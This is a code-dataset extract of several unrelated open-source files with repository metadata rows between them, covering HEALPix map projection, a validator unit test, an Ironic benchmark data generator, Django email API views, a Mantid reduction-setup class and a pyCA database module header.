count = 0
duration = 0
end = time.time()
if(verbose): print( '>', samplename, ': tree making took : %.2f' % float(end - start), 'sec for', len(tbdata), 'images')
return treemap
# ---------------------------------------------------------------------------------------- #
# Class for multi-dimensional healpix map that can be
# created and processed in parallel.
class HealTree:
# Initialise and create array of pixels
def __init__(self, nside):
self.nside = nside
self.npix = 12*nside**2
self.pixlist = np.zeros(self.npix, dtype=object)
# Process image and absorb its properties
def addElem(self, propertyArray, ratiores, pixoffset):
# Retrieve pixel indices
ipixels, weights, thetas_c, phis_c, subpixrings = computeHPXpix_sequ_new(self.nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
# DEBUGGING - MARCM
#print "deguging ipix addElem", ipixels
# For each pixel, absorb image properties
for ii, (ipix, weight) in enumerate(zip(ipixels, weights)):
if self.pixlist[ipix] == 0:
self.pixlist[ipix] = NDpix(propertyArray, subpixrings[ii,:], ratiores)
else:
self.pixlist[ipix].addElem(propertyArray, subpixrings[ii,:])
def addElem_simp(self, propertyArray):
#AJR hack
# Retrieve non-conservative pixel indices, no oversampling, just the pixels with centers in the CCD
ipixels = computeHPXpix_sequ_new_simp(self.nside, propertyArray)
# For each pixel, absorb image properties
#if ipixels == -1:
# return True
#if len(i
for ipix in ipixels:
if self.pixlist[ipix] == 0:
self.pixlist[ipix] = NDpix_simp(propertyArray)
else:
self.pixlist[ipix].addElem(propertyArray)
# Project HealTree into partial Healpix map
# for a given property and operation applied to its array of images
def project_partial(self, property, weights, operation, pool=None):
ind = np.where(self.pixlist != 0)
pixel = np.arange(self.npix)[ind]
        verbcount = max(1, pixel.size // 10)
count = 0
start = time.time()
duration = 0
signal = np.zeros(pixel.size)
for i, pix in enumerate(self.pixlist[ind]):
count += 1
start_one = time.time()
signal[i] = pix.project(property, weights, operation)
end_one = time.time()
duration += float(end_one - start_one)
if count == verbcount:
if(verbose): print( '>', property, weights, operation, ': processed pixels', i-verbcount+1, '-', i+1, '(on '+str(pixel.size)+') in %.1e' % duration, 'sec (~ %.1e' % (duration/float(verbcount)), 'per pixel)')
count = 0
duration = 0
end = time.time()
print( '> Projection', property, weights, operation, ' took : %.2f' % float(end - start), 'sec for', pixel.size, 'pixels')
#signal = [pix.project(property, weights, operation) for pix in self.pixlist[ind]]
return pixel, signal
# Project HealTree into regular Healpix map
# for a given property and operation applied to its array of images
def project(self, property, weights, operation, pool=None):
outmap = np.zeros(self.npix)
outmap.fill(hp.UNSEEN)
if pool is None:
for ipix, pix in enumerate(self.pixlist):
if pix != 0:
outmap[ipix] = pix.project(property, weights, operation)
else:
outmap = np.array( pool.map( projectNDpix, [ (pix, property, weights, operation) for pix in self.pixlist ] ) )
return outmap
# ---------------------------------------------------------------------------------------- #
def makeHpxMap(args):
healtree, property, weights, operation = args
return healtree.project(property, weights, operation)
# ---------------------------------------------------------------------------------------- #
def makeHpxMap_partial(args):
healtree, property, weights, operation = args
return healtree.project_partial(property, weights, operation)
# ---------------------------------------------------------------------------------------- #
def addElemHealTree(args):
healTree, propertyArray, ratiores = args
healTree.addElem(propertyArray, ratiores)
# ---------------------------------------------------------------------------------------- #
# Process image and absorb its properties (legacy parallel path: relies on
# module-level globalTree and pixoffset being defined by the caller)
def addElem(args):
iarr, tbdatadtype, propertyArray, nside, propertiesToKeep, ratiores = args
propertyArray.dtype = tbdatadtype
if(verbose): print( 'Processing image', iarr, propertyArray['RA'])
# Retrieve pixel indices
ipixels, weights, thetas_c, phis_c = computeHPXpix_sequ_new(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
print( 'Processing image', iarr, thetas_c, phis_c)
# For each pixel, absorb image properties
for ipix, weight in zip(ipixels, weights):
if globalTree[ipix] == 0:
globalTree[ipix] = NDpix(propertyArray, propertiesToKeep, weight=weight)
else:
globalTree[ipix].addElem(propertyArray, propertiesToKeep, weight=weight)
# ---------------------------------------------------------------------------------------- #
# Read and project a Healtree into Healpix maps, and write them.
def project_and_write_maps(mode, propertiesweightsoperations, tbdata, catalogue_name, outrootdir, sample_names, inds, nside, ratiores, pixoffset, nsidesout=None):
resol_prefix = 'nside'+str(nside)+'_oversamp'+str(ratiores)
outroot = outrootdir + '/' + catalogue_name + '/' + resol_prefix + '/'
mkdir_p(outroot)
if mode == 1: # Fully sequential
for sample_name, ind in zip(sample_names, inds):
#print len(tbdata[ind]['ra1'])
#plt.plot(tbdata[ind]['ra1'],tbdata[ind]['dec1'],'k,')
#plt.show()
treemap = makeHealTree( (catalogue_name+'_'+sample_name, nside, ratiores, pixoffset, np.array(tbdata[ind])) )
for property, weights, operation in propertiesweightsoperations:
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
if nsidesout is None:
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print( 'Creating and writing', fname)
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
else:
cutmap_indices_nest = hp.ring2nest(nside, cutmap_indices)
outmap_hi = np.zeros(hp.nside2npix(nside))
outmap_hi.fill(0.0) #outmap_hi.fill(hp.UNSEEN)
outmap_hi[cutmap_indices_nest] = cutmap_signal
for nside_out in nsidesout:
if nside_out == nside:
outmap_lo = outmap_hi
else:
outmap_lo = hp.ud_grade(outmap_hi, nside_out, order_in='NESTED', order_out='NESTED')
resol_prefix2 = 'nside'+str(nside_out)+'from'+str(nside)+'o'+str(ratiores)
outroot2 = outrootdir + '/' + catalogue_name + '/' + resol_prefix2 + '/'
mkdir_p(outroot2)
fname = outroot2 + '_'.join([catalogue_name, sample_name, resol_prefix2, property, weights, operation]) + '.fits'
print( 'Writing', fname)
hp.write_map(fname, outmap_lo, nest=True)
subprocess.call("gzip -f "+fname,shell=True)
if mode == 3: # Fully parallel
pool = Pool(len(inds))
print( 'Creating HealTrees')
treemaps = pool.map( makeHealTree,
[ (catalogue_name+'_'+samplename, nside, ratiores, pixoffset, np.array(tbdata[ind]))
for samplename, ind in zip(sample_names, inds) ] )
for property, weights, operation in propertiesweightsoperations:
print( 'Making maps for', property, weights, operation)
outmaps = pool.map( makeHpxMap_partial,
[ (treemap, property, weights, operation) for treemap in treemaps ] )
for sample_name, outmap in zip(sample_names, outmaps):
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print( 'Writing', fname)
cutmap_indices, cutmap_signal = outmap
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
if mode == 2: # Parallel tree making and sequential writing
pool = Pool(len(inds))
print( 'Creating HealTrees')
treemaps = pool.map( makeHealTree,
[ (catalogue_name+'_'+samplename, nside, ratiores, pixoffset, np.array(tbdata[ind]))
for samplename, ind in zip(sample_names, inds) ] )
for property, weights, operation in propertiesweightsoperations:
for sample_name, treemap in zip(sample_names, treemaps):
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print('Writing', fname)
#outmap = makeHpxMap( (treemap, property, weights, operation) )
#hp.write_map(fname, outmap, nest=False)
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
def project_and_write_maps_simp(mode, propertiesweightsoperations, tbdata, catalogue_name, outrootdir, sample_names, inds, nside):
#hack by AJR and MarcM
#nwrong = 0 #number of wrong projected pixels
resol_prefix = 'nside'+str(nside)+'_oversamp1'
outroot = outrootdir + '/' + catalogue_name + '/' + resol_prefix + '/'
mkdir_p(outroot)
for sample_name, ind in zip(sample_names, inds):
treemap = makeHealTree_simp( (catalogue_name+'_'+sample_name, nside, np.array(tbdata[ind])) )
for property, weights, operation in propertiesweightsoperations:
cutmap_indices, cutmap_signal = makeHpxMap_partial( (treemap, property, weights, operation) )
fname = outroot + '_'.join([catalogue_name, sample_name, resol_prefix, property, weights, operation]) + '.fits'
print('Creating and writing', fname)
write_partial_map(fname, cutmap_indices, cutmap_signal, nside, nest=False)
#print "number of wrong projected ccd-pointings is: ", nwrong
# ---------------------------------------------------------------------------------------- #
def test():
fname = '/Users/bl/Dropbox/Projects/Quicksip/data/SVA1_COADD_ASTROM_PSF_INFO.fits'
#fname = '/Users/bl/Dropbox/Projects/Quicksip/data/Y1A1_IMAGEINFO_and_COADDINFO.fits'
pixoffset = 10
hdulist = pyfits.open(fname)
tbdata = hdulist[1].data
hdulist.close()
nside = 1024
ratiores = 4
treemap = HealTree(nside)
#results = pool.map(treemap.addElem, [imagedata for imagedata in tbdata])
print( tbdata.dtype)
#ind = np.ndarray([0])
ind = np.where( tbdata['band'] == 'i' )
import numpy.random
ind = numpy.random.choice(ind[0], 1 )
print( 'Number of images :', len(ind))
hpxmap = np.zeros(hp.nside2npix(nside))
ras_c = []
decs_c = []
for i, propertyArray in enumerate(tbdata[ind]):
ras_c.append(propertyArray['RA'])
decs_c.append(propertyArray['DEC'])
plt.figure()
for i, propertyArray in enumerate(tbdata[ind]):
print(i)
propertyArray.dtype = tbdata.dtype
listpix, weights, thetas_c, phis_c, listpix_sup = computeHPXpix_sequ_new(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
#listpix2, weights2, thetas_c2, phis_c2 = computeHPXpix_sequ(nside, propertyArray, pixoffset=pixoffset, ratiores=ratiores)
hpxmap = np.zeros(hp.nside2npix(nside))
hpxmap[listpix] = weights
hpxmap_sup = np.zeros(hp.nside2npix(ratiores*nside))
hpxmap_sup[listpix_sup] = 1.0
listpix_hi, weights_hi, thetas_c_hi, phis_c_hi, superind_hi = computeHPXpix_sequ_new(ratiores*nside, propertyArray, pixoffset=pixoffset, ratiores=1)
hpxmap_hi = np.zeros(hp.nside2npix(ratiores*nside))
hpxmap_hi[listpix_hi] = weights_hi
hpxmap_hitolo = hp.ud_grade(hpxmap_hi, nside)
print('valid hpxmap_hi', np.where(hpxmap_hi > 0)[0])
print('hpxmap', zip(np.where(hpxmap > 0)[0], hpxmap[hpxmap > 0]))
print('hpxmap_sup', zip(np.where(hpxmap_sup > 0)[0], hpxmap_sup[hpxmap_sup > 0]))
print('hpxmap_hitolo', zip(np.where(hpxmap_hitolo > 0)[0], hpxmap_hitolo[hpxmap_hitolo > 0]))
hp.gnomview(hpxmap_hi, title='hpxmap_hi', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap_sup, title='hpxmap_sup', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap_hitolo, title='hpxmap_hitolo', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
hp.gnomview(hpxmap, title='hpxmap', rot=[propertyArray['RA'], propertyArray['DEC']], reso=0.2)
#plt.plot(phis_c, thetas_c)
thetas, phis = hp.pix2ang(nside, listpix)
#plt.scatter(phis, thetas, color='red', marker='o', s=50*weights)
#plt.scatter(propertyArray['RA']*np.pi/180, np.pi/2 - propertyArray['DEC']*np.pi/180)
#plt.text(propertyArray['RA']*np.pi/180, np.pi/2 - propertyArray['DEC']*np.pi/180, str(i))
plt.show()
    return
#if __name__ == "__main__":
# test()
| gpl-2.0 | -6,887,529,562,619,616,000 | 42.075105 | 223 | 0.562613 | false |
chambers-brian/SIG_Digital-Strategy_SI_ODP_Backend | tests/unit/dataactvalidator/test_b7_object_class_program_activity_2.py | 1 | 1566 | from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'b7_object_class_program_activity_2'
def test_column_headers(database):
expected_subset = {'row_number', 'gross_outlays_delivered_or_cpe', 'ussgl490200_delivered_orde_cpe',
'ussgl490800_authority_outl_cpe', 'ussgl498200_upward_adjustm_cpe'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Test Object Class Program Activity gross_outlays_delivered_or_cpe equals ussgl490200_delivered_orde_cpe +
ussgl490800_authority_outl_cpe + ussgl498200_upward_adjustm_cpe """
op = ObjectClassProgramActivityFactory(gross_outlays_delivered_or_cpe=3, ussgl490200_delivered_orde_cpe=1,
ussgl490800_authority_outl_cpe=1, ussgl498200_upward_adjustm_cpe=1)
assert number_of_errors(_FILE, database, models=[op]) == 0
def test_failure(database):
""" Test Object Class Program Activity gross_outlays_delivered_or_cpe doesn't equals ussgl490200_delivered_orde_cpe +
ussgl490800_authority_outl_cpe + ussgl498200_upward_adjustm_cpe """
op = ObjectClassProgramActivityFactory(gross_outlays_delivered_or_cpe=1, ussgl490200_delivered_orde_cpe=1,
ussgl490800_authority_outl_cpe=1, ussgl498200_upward_adjustm_cpe=1)
assert number_of_errors(_FILE, database, models=[op]) == 1
| cc0-1.0 | -5,720,147,414,092,024,000 | 46.454545 | 121 | 0.714559 | false |
openstack/ironic | tools/benchmark/do_not_run_create_benchmark_data.py | 1 | 4622 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import time
from oslo_db.sqlalchemy import enginefacade
from sqlalchemy import sql
from ironic.common import service
from ironic.conf import CONF # noqa To Load Configuration
from ironic.objects import node
def _create_test_nodes():
print("Starting creation of fake nodes.")
start = time.time()
node_count = 10000
checkin = time.time()
for i in range(0, node_count):
new_node = node.Node({
'power_state': 'power off',
'driver': 'ipmi',
'driver_internal_info': {'test-meow': i},
'name': 'BenchmarkTestNode-%s' % i,
'driver_info': {
'ipmi_username': 'admin',
'ipmi_password': 'admin',
'ipmi_address': 'testhost%s.env.top.level.domain' % i},
'resource_class': 'CUSTOM_BAREMETAL',
'properties': {
'cpu': 4,
'memory': 32,
'cats': i,
'meowing': True}})
new_node.create()
delta = time.time() - checkin
if delta > 10:
checkin = time.time()
print('* At %s nodes, %0.02f seconds. Total elapsed: %s'
% (i, delta, time.time() - start))
created = time.time()
elapse = created - start
print('Created %s nodes in %s seconds.\n' % (node_count, elapse))
def _mix_up_nodes_data():
engine = enginefacade.writer.get_engine()
conn = engine.connect()
# A list of commands to mix up indexed field data a bit to emulate what
# a production database may somewhat look like.
commands = [
"UPDATE nodes set maintenance = True where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set driver = 'redfish' where RAND() < 0.5", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor01' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor02' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor03' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor04' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor05' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set reservation = 'fake_conductor06' where RAND() < 0.02", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'active' where RAND() < 0.8", # noqa Easier to read this way
"UPDATE nodes set power_state = 'power on' where provision_state = 'active' and RAND() < 0.95", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'available' where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'manageable' where RAND() < 0.1", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'clean wait' where RAND() < 0.05", # noqa Easier to read this way
"UPDATE nodes set provision_state = 'error' where RAND() < 0.05", # noqa Easier to read this way
"UPDATE nodes set owner = (select UUID()) where RAND() < 0.2", # noqa Easier to read this way
"UPDATE nodes set lessee = (select UUID()) where RAND() < 0.2", # noqa Easier to read this way
"UPDATE nodes set instance_uuid = (select UUID()) where RAND() < 0.95 and provision_state = 'active'", # noqa Easier to read this way
"UPDATE nodes set last_error = (select UUID()) where RAND() <0.05", # noqa Easier to read this way
]
start = time.time()
for command in commands:
print("Executing SQL command: \\" + command + ";\n")
conn.execute(sql.text(command))
print("* Completed command. %0.04f elapsed since start of commands."
% (time.time() - start))
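
# Hedged usage note: main() below runs only the node-creation stage. A
# fuller benchmark data set would also randomise the indexed fields;
# assuming a configured database, the two stages can be chained like this:
def _example_full_benchmark_setup():
    service.prepare_service()
    _create_test_nodes()
    _mix_up_nodes_data()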
def main():
service.prepare_service()
CONF.set_override('debug', False)
_create_test_nodes()
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | -364,045,721,960,664,100 | 45.686869 | 142 | 0.618347 | false |
CCI-MOC/GUI-Backend | api/v1/views/email.py | 1 | 4618 | """
Atmosphere api email
"""
from rest_framework.response import Response
from rest_framework import status
from django.template.loader import render_to_string
from django.template import Context
from threepio import logger
from django_cyverse_auth.protocol.ldap import lookupEmail
from core.models import AtmosphereUser as User
from core.email import email_admin, resource_request_email
from api import failure_response
from api.v1.views.base import AuthAPIView
class Feedback(AuthAPIView):
"""
Post feedback via RESTful API
"""
def post(self, request):
"""
Creates a new feedback email and sends it to admins.
"""
required = ["message", "user-interface"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
result = self._email(request,
request.user.username,
lookupEmail(request.user.username),
request.data["message"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, username, user_email, message):
"""
Sends an email to support based on feedback from a client machine
Returns a response.
"""
user = User.objects.get(username=username)
subject = 'Subject: Atmosphere Client Feedback from %s' % username
context = {
"user": user,
"feedback": message
}
body = render_to_string("core/email/feedback.html",
context=Context(context))
email_success = email_admin(request, subject, body, request_tracker=True)
if email_success:
resp = {'result':
{'code': 'success',
'meta': '',
'value': (
'Thank you for your feedback! '
'Support has been notified.')}}
else:
resp = {'result':
{'code': 'failed',
'meta': '',
'value': 'Failed to send feedback!'}}
return resp
class QuotaEmail(AuthAPIView):
"""
Post Quota Email via RESTful API.
"""
def post(self, request):
"""
Creates a new Quota Request email and sends it to admins.
"""
required = ["quota", "reason"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
logger.debug("request.data = %s" % (str(request.data)))
result = self._email(request,
request.user.username,
request.data["quota"],
request.data["reason"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, username, new_resource, reason):
"""
Processes resource request increases. Sends email to the admins
Returns a response.
"""
return resource_request_email(request, username, new_resource, reason)
class SupportEmail(AuthAPIView):
def post(self, request):
"""
Creates a new support email and sends it to admins.
Post Support Email via RESTful API
"""
required = ["message", "subject", "user-interface"]
missing_keys = check_missing_keys(request.data, required)
if missing_keys:
return keys_not_found(missing_keys)
result = self._email(request,
request.data["subject"],
request.data["message"])
return Response(result, status=status.HTTP_201_CREATED)
def _email(self, request, subject, message):
"""
Sends an email to support.
POST Params expected:
* user
* message
* subject
Returns a response.
"""
email_success = email_admin(request, subject, message, request_tracker=True)
return {"email_sent": email_success}
def check_missing_keys(data, required_keys):
"""
Return any missing required post key names.
"""
    return [key for key in required_keys
            # Key must exist and have a non-empty value.
            if key not in data or
            (isinstance(data[key], str) and len(data[key]) == 0)]
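
# Hedged example of the validation pair used by the views above; the
# payload keys mirror Feedback.post and are otherwise arbitrary.
def _example_check_missing_keys():
    data = {"message": "hello", "user-interface": ""}
    missing = check_missing_keys(data, ["message", "user-interface"])
    # "user-interface" is present but empty, so it is reported as missing
    return keys_not_found(missing) if missing else None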
def keys_not_found(missing_keys):
return failure_response(
status.HTTP_400_BAD_REQUEST,
"Missing required POST data variables : %s" % missing_keys)
| apache-2.0 | 1,517,545,801,638,144,800 | 30.848276 | 84 | 0.569944 | false |
neo1691/scorer.py | scorer/ui.py | 1 | 1402 | from curses import wrapper
import curses
import logging
logger = logging.getLogger('scorer.ui')
def printGames(stdscr, matches, selected):
stdscr.clear()
stdscr.addstr(0, 0, "The Following games \
are available Right now\n", curses.color_pair(1))
for index, game in enumerate(matches):
if index != selected:
stdscr.addstr(index+1, 10, game, curses.color_pair(0))
else:
stdscr.addstr(index+1, 10, game, curses.color_pair(2))
stdscr.refresh()
def main(stdscr, matches):
curses.curs_set(False)
selected = 0
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
while True:
printGames(stdscr, matches, selected)
event = stdscr.getch()
if event == ord("\n"):
logging.info("Enter key pressed")
return selected
elif event == curses.KEY_UP:
logging.info("Up key pressed")
if selected != 0:
selected -= 1
printGames(stdscr, matches, selected)
elif event == curses.KEY_DOWN:
logging.info("Down key pressed")
if selected != len(matches) - 1:
selected += 1
printGames(stdscr, matches, selected)
def getUserInput(matches):
selected = wrapper(main, matches)
return selected
| gpl-2.0 | 5,232,536,504,837,891,000 | 30.155556 | 66 | 0.601284 | false |
dymkowsk/mantid | scripts/Interface/reduction_gui/reduction/inelastic/dgs_sample_data_setup_script.py | 1 | 12591 | #pylint: disable=invalid-name
"""
Classes for each reduction step. Those are kept separately
from the interface class so that the DgsReduction class could
be used independently of the interface implementation
"""
from __future__ import (absolute_import, division, print_function)
import os
import xml.dom.minidom
from reduction_gui.reduction.scripter import BaseScriptElement
class SampleSetupScript(BaseScriptElement):
sample_file = ""
live_button = False
output_wsname = ""
detcal_file = ""
relocate_dets = False
incident_energy_guess = ""
use_ei_guess = False
tzero_guess = 0.0
monitor1_specid = ""
monitor2_specid = ""
rebin_et = False
et_range_low = ""
et_range_width = ""
et_range_high = ""
et_is_distribution = True
hardmask_file = ""
grouping_file = ""
show_workspaces = False
savedir = ""
def __init__(self, inst_name):
super(SampleSetupScript, self).__init__()
self.set_default_pars(inst_name)
self.reset()
def set_default_pars(self, inst_name):
from Interface.reduction_gui.reduction.inelastic import dgs_utils
ip = dgs_utils.InstrumentParameters(inst_name)
SampleSetupScript.monitor1_specid = str(int(ip.get_parameter("ei-mon1-spec")))
SampleSetupScript.monitor2_specid = str(int(ip.get_parameter("ei-mon2-spec")))
    def to_script(self):
        script = ""
        if not self.live_button:
            script += "SampleInputFile=\"%s\",\n" % self.sample_file
        else:
            script += "SampleInputWorkspace=input,\n"
        tmp_wsname = ""
        if self.output_wsname == SampleSetupScript.output_wsname:
            # Make a default name from the incoming file
            tmp = os.path.split(os.path.splitext(str(self.sample_file))[0])[-1]
            tmp_wsname = tmp + "_spe"
        else:
            tmp_wsname = self.output_wsname
        script += "OutputWorkspace=\"%s\",\n" % tmp_wsname
        if self.detcal_file != SampleSetupScript.detcal_file:
            script += "DetCalFilename=\"%s\",\n" % self.detcal_file
        if self.relocate_dets != SampleSetupScript.relocate_dets:
            script += "RelocateDetectors=%s,\n" % self.relocate_dets
        if self.incident_energy_guess != SampleSetupScript.incident_energy_guess:
            script += "IncidentEnergyGuess=%s,\n" % float(self.incident_energy_guess)
        if self.use_ei_guess != SampleSetupScript.use_ei_guess:
            script += "UseIncidentEnergyGuess=%s,\n" % self.use_ei_guess
        if self.tzero_guess != SampleSetupScript.tzero_guess:
            script += "TimeZeroGuess=%s,\n" % str(self.tzero_guess)
        if self.monitor1_specid != SampleSetupScript.monitor1_specid:
            try:
                temp1 = int(self.monitor1_specid)
                script += "Monitor1SpecId=%s,\n" % temp1
            except ValueError:
                pass
        if self.monitor2_specid != SampleSetupScript.monitor2_specid:
            try:
                temp2 = int(self.monitor2_specid)
                script += "Monitor2SpecId=%s,\n" % temp2
            except ValueError:
                pass
        if self.et_range_low != SampleSetupScript.et_range_low or \
                self.et_range_width != SampleSetupScript.et_range_width or \
                self.et_range_high != SampleSetupScript.et_range_high:
            script += "EnergyTransferRange=\"%s,%s,%s\",\n" % (self.et_range_low,
                                                               self.et_range_width,
                                                               self.et_range_high)
        if self.et_is_distribution != SampleSetupScript.et_is_distribution:
            script += "SofPhiEIsDistribution=%s,\n" % self.et_is_distribution
        if self.hardmask_file != SampleSetupScript.hardmask_file:
            script += "HardMaskFile=\"%s\",\n" % self.hardmask_file
        if self.grouping_file != SampleSetupScript.grouping_file:
            script += "GroupingFile=\"%s\",\n" % self.grouping_file
        if self.show_workspaces:
            script += "ShowIntermediateWorkspaces=%s,\n" % self.show_workspaces
        if self.savedir != SampleSetupScript.savedir:
            script += "OutputDirectory=\"%s\",\n" % self.savedir
        return script
    def to_xml(self):
        """
        Create XML from the current data.
        """
        xml_str = "<SampleSetup>\n"
        xml_str += " <sample_input_file>%s</sample_input_file>\n" % self.sample_file
        xml_str += " <live_button>%s</live_button>\n" % self.live_button
        xml_str += " <output_wsname>%s</output_wsname>\n" % self.output_wsname
        xml_str += " <detcal_file>%s</detcal_file>\n" % self.detcal_file
        xml_str += " <relocate_dets>%s</relocate_dets>\n" % self.relocate_dets
        xml_str += " <incident_energy_guess>%s</incident_energy_guess>\n" % self.incident_energy_guess
        xml_str += " <use_ei_guess>%s</use_ei_guess>\n" % str(self.use_ei_guess)
        xml_str += " <tzero_guess>%s</tzero_guess>\n" % str(self.tzero_guess)
        xml_str += " <monitor1_specid>%s</monitor1_specid>\n" % self.monitor1_specid
        xml_str += " <monitor2_specid>%s</monitor2_specid>\n" % self.monitor2_specid
        xml_str += " <et_range>\n"
        xml_str += "  <low>%s</low>\n" % self.et_range_low
        xml_str += "  <width>%s</width>\n" % self.et_range_width
        xml_str += "  <high>%s</high>\n" % self.et_range_high
        xml_str += " </et_range>\n"
        xml_str += " <sofphie_is_distribution>%s</sofphie_is_distribution>\n" % str(self.et_is_distribution)
        xml_str += " <hardmask_file>%s</hardmask_file>\n" % self.hardmask_file
        xml_str += " <grouping_file>%s</grouping_file>\n" % self.grouping_file
        xml_str += " <show_workspaces>%s</show_workspaces>\n" % self.show_workspaces
        xml_str += " <savedir>%s</savedir>\n" % self.savedir
        xml_str += "</SampleSetup>\n"
        return xml_str
    def from_xml(self, xml_str):
        """
        Read in data from XML
        @param xml_str: text to read the data from
        """
        dom = xml.dom.minidom.parseString(xml_str)
        element_list = dom.getElementsByTagName("SampleSetup")
        if len(element_list) > 0:
            instrument_dom = element_list[0]
            self.sample_file = BaseScriptElement.getStringElement(instrument_dom,
                                                                  "sample_input_file",
                                                                  default=SampleSetupScript.sample_file)
            self.live_button = BaseScriptElement.getBoolElement(instrument_dom,
                                                                "live_button",
                                                                default=SampleSetupScript.live_button)
            self.output_wsname = BaseScriptElement.getStringElement(instrument_dom,
                                                                    "output_wsname",
                                                                    default=SampleSetupScript.output_wsname)
            self.detcal_file = BaseScriptElement.getStringElement(instrument_dom,
                                                                  "detcal_file",
                                                                  default=SampleSetupScript.detcal_file)
            self.relocate_dets = BaseScriptElement.getBoolElement(instrument_dom,
                                                                  "relocate_dets",
                                                                  default=SampleSetupScript.relocate_dets)
            self.incident_energy_guess = BaseScriptElement.getStringElement(instrument_dom,
                                                                            "incident_energy_guess",
                                                                            default=SampleSetupScript.incident_energy_guess)
            self.use_ei_guess = BaseScriptElement.getBoolElement(instrument_dom,
                                                                 "use_ei_guess",
                                                                 default=SampleSetupScript.use_ei_guess)
            self.tzero_guess = BaseScriptElement.getFloatElement(instrument_dom,
                                                                 "tzero_guess",
                                                                 default=SampleSetupScript.tzero_guess)
            self.monitor1_specid = BaseScriptElement.getStringElement(instrument_dom,
                                                                      "monitor1_specid",
                                                                      default=SampleSetupScript.monitor1_specid)
            self.monitor2_specid = BaseScriptElement.getStringElement(instrument_dom,
                                                                      "monitor2_specid",
                                                                      default=SampleSetupScript.monitor2_specid)
            self.et_range_low = BaseScriptElement.getStringElement(instrument_dom,
                                                                   "et_range/low",
                                                                   default=SampleSetupScript.et_range_low)
            self.et_range_width = BaseScriptElement.getStringElement(instrument_dom,
                                                                     "et_range/width",
                                                                     default=SampleSetupScript.et_range_width)
            self.et_range_high = BaseScriptElement.getStringElement(instrument_dom,
                                                                    "et_range/high",
                                                                    default=SampleSetupScript.et_range_high)
            self.et_is_distribution = BaseScriptElement.getBoolElement(instrument_dom,
                                                                       "sofphie_is_distribution",
                                                                       default=SampleSetupScript.et_is_distribution)
            self.hardmask_file = BaseScriptElement.getStringElement(instrument_dom,
                                                                    "hardmask_file",
                                                                    default=SampleSetupScript.hardmask_file)
            self.grouping_file = BaseScriptElement.getStringElement(instrument_dom,
                                                                    "grouping_file",
                                                                    default=SampleSetupScript.grouping_file)
            self.show_workspaces = BaseScriptElement.getBoolElement(instrument_dom,
                                                                    "show_workspaces",
                                                                    default=SampleSetupScript.show_workspaces)
            self.savedir = BaseScriptElement.getStringElement(instrument_dom,
                                                              "savedir",
                                                              default=SampleSetupScript.savedir)
    def reset(self):
        """
        Reset state
        """
        self.sample_file = SampleSetupScript.sample_file
        self.live_button = SampleSetupScript.live_button
        self.output_wsname = SampleSetupScript.output_wsname
        self.detcal_file = SampleSetupScript.detcal_file
        self.relocate_dets = SampleSetupScript.relocate_dets
        self.incident_energy_guess = SampleSetupScript.incident_energy_guess
        self.use_ei_guess = SampleSetupScript.use_ei_guess
        self.tzero_guess = SampleSetupScript.tzero_guess
        self.monitor1_specid = SampleSetupScript.monitor1_specid
        self.monitor2_specid = SampleSetupScript.monitor2_specid
        self.rebin_et = SampleSetupScript.rebin_et
        self.et_range_low = SampleSetupScript.et_range_low
        self.et_range_width = SampleSetupScript.et_range_width
        self.et_range_high = SampleSetupScript.et_range_high
        self.et_is_distribution = SampleSetupScript.et_is_distribution
        self.hardmask_file = SampleSetupScript.hardmask_file
        self.grouping_file = SampleSetupScript.grouping_file
        self.show_workspaces = SampleSetupScript.show_workspaces
        self.savedir = SampleSetupScript.savedir
opencast/pyCA | pyca/db.py | 1 | 6175 | # -*- coding: utf-8 -*-
'''
pyca.db
~~~~~~~

Database specification for pyCA
'''

import json
import os.path
import string

from pyca.config import config
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Text, LargeBinary, DateTime, \
    create_engine
